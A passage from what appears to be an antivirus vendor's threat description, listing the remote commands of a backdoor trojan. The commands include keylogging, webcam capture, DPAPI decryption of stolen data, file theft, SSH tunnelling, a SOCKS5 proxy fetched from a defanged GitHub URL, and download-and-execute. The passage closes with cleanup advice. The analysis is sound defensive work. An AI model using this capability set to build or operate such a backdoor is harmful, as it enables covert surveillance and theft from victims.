  • NETDISCOVER ― creates a separate thread that scans the local network.
  • DPAPI <data> ― decrypts user data that was previously uploaded to the C&C server and can only be decrypted locally on the infected computer (under the account that protected it). The encrypted data is passed in the argument.
  • WEBCAM ― takes a picture with the web camera.
  • COMPRESS <file_name> ― places the specified file into a ZIP archive. The name of the target file is passed in the argument.
  • DECOMPRESS <file_name> ― extracts files from the target ZIP archive. The name of the archive is passed in the argument.
  • TRANSFER ― not implemented.
  • GET_FILE <file_name> ― reads the contents of the target file. The file name is passed in the argument.
  • LIST_FILES ― lists the current directory.
  • LIST_PROCESSES ― builds a list of running processes.
  • EXPOSE <ip> <port> <http_version> ― launches an SSH session. The arguments are:
    • the IP address to connect to;
    • the port number;
    • the scheme to use (HTTP or HTTPS).
  • PROXY_SETUP ― sets up a SOCKS5 proxy server on the infected system:
    • downloads the socks5 proxy application from hxxps[:]//github[.]com/wzshiming/socks5/releases/download/v0.4.2/socks5_windows_amd64.exe and saves it as %LOCALAPPDATA%/9hyfy7lwm1/proxy.exe;
    • generates a random port;
    • launches proxy.exe -a 127.0.0.1:<random_port>;
    • connects to this port via the SSH protocol.
  • KEYLOGGER START ― starts the keylogger.
  • KEYLOGGER STOP ― stops the keylogger.
  • KEYLOGGER VIEW ― returns the data recorded by the keylogger.
  • LOADEXEC <url> ― downloads a file and launches it. The argument is the URL of the file.
  • LOADER <url> ― downloads a file. The argument is the URL of the file.
  • cd <path> ― changes the current directory. The argument is the path of the new directory.

Treatment recommendations

  1. If the operating system can boot (in normal mode or in safe mode), download the Dr.Web CureIt! curing utility and use it to run a full scan of your computer and of any removable media you use.
  2. If the operating system cannot boot, change your computer's BIOS settings so that the PC can boot from a CD or a USB drive. Download the Dr.Web® LiveDisk emergency system-recovery disk image or the utility for writing Dr.Web® LiveDisk to a USB drive, and prepare the corresponding medium. Boot the computer from that medium, run a full scan and cure the threats found.